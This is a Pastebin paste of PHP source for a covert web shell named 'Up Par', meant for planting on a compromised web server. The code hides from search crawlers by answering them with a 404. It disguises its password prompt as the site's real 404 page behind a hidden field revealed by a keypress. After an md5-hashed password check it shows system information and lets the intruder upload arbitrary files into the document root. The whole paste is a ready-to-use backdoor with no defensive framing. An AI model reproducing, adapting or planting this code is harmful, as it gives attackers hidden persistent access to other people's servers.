Advertisement
cdfteller

Up Par

Jul 5th, 2022
810
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.24 KB | None
  1. <html>
  2. <?php
  3. $auth_pass = "1097f58d69c79fce85e73ccb30ca2043";
  4.  
  5. session_start();
  6. error_reporting(0);
  7. $color = "#00ff00";
  8. $default_action = 'FilesMan';
  9. $default_use_ajax = true;
  10. $default_charset = 'UTF-8';
  11. if (!empty($_SERVER['HTTP_USER_AGENT'])) {
  12.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  13.     if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  14.         header('HTTP/1.0 404 Not Found');
  15.         exit;
  16.     }
  17. } function login_shell() {
  18.     $random_url = mt_rand(1000000, 247345736453);
  19.     $curl = curl_init();
  20.     $protocol = 'http://';
  21.     if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') {
  22.         $protocol = 'https://';
  23.     }
  24.     curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
  25.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  26.     $server_404 = curl_exec($curl);
  27.     $server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
  28.     $server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
  29.     echo $server_404;
  30.     ?>
  31. <head>
  32. <style type="text/css">
  33. html {
  34.     margin: 20px auto;
  35. }
  36. header {
  37.     margin: 10px auto;
  38. }
  39. input[type=password] {
  40.     width: 180px;
  41.     height: 2opx;
  42.     color: black;
  43.     border: 1px dotted green;
  44.     padding: 5px;
  45.     margin-left: 20px;
  46.     text-align: center;
  47. }
  48. </style>
  49. </head>
  50. <body onkeyup="displayunicode(event); this.select()">
  51. <script type="text/javascript">
  52. function displayunicode(e){
  53.     var unicode=e.keyCode? e.keyCode : e.charCode
  54.     if(unicode==187){
  55.         document.getElementById('pass').type = 'password';
  56.         document.getElementById("member");
  57.     }
  58. }
  59. </script>
  60. <form method="post">
  61. <center>
  62. <input type="hidden" name="pass" id="pass"></center>
  63. <p id="member"></p>
  64. </form>
  65. </body>
  66. <?php
  67.     exit;
  68. }
  69. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST']) ])) if (empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) $_SESSION[md5($_SERVER['HTTP_HOST']) ] = true;
  70. else login_shell();
  71.  
  72. echo "<b>".php_uname()."</b><br><br>";
  73.  
  74. echo "<form method='post' enctype='multipart/form-data'>
  75.  
  76.       <input type='file' name='idx_file'>
  77.  
  78.       <input type='submit' name='upload' value='upload'>
  79.  
  80.       </form>";
  81.  
  82. $root = $_SERVER['DOCUMENT_ROOT'];
  83.  
  84. $files = $_FILES['idx_file']['name'];
  85.  
  86. $dest = $root.'/'.$files;
  87.  
  88. if(isset($_POST['upload'])) {
  89.  
  90.     if(is_writable($root)) {
  91.  
  92.         if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
  93.  
  94.             $web = "http://".$_SERVER['HTTP_HOST']."/";
  95.  
  96.             echo "sukses -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  97.  
  98.         } else {
  99.  
  100.             echo "gagal ;(";
  101.  
  102.         }
  103.  
  104.     } else {
  105.  
  106.         if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
  107.  
  108.             echo "sukses upload <b>$files</b> di folder ini";
  109.  
  110.         } else {
  111.  
  112.             echo "gagal upload";
  113.  
  114.         }
  115.  
  116.     }
  117.  
  118. }
  119. echo "<br><a href='?logout=true'>Logout</a>";
  120.  if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  121.  echo "<script>window.location=' ? ';
  122. </script>";
  123.  }
  124.  if($_GET['logout'] == true) {
  125.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  126.     echo "<script>window.location=' ? ';</script>";
  127.    
  128. }
  129. ?>
  130. </html>
Advertisement
RAW Paste Data Copied
Advertisement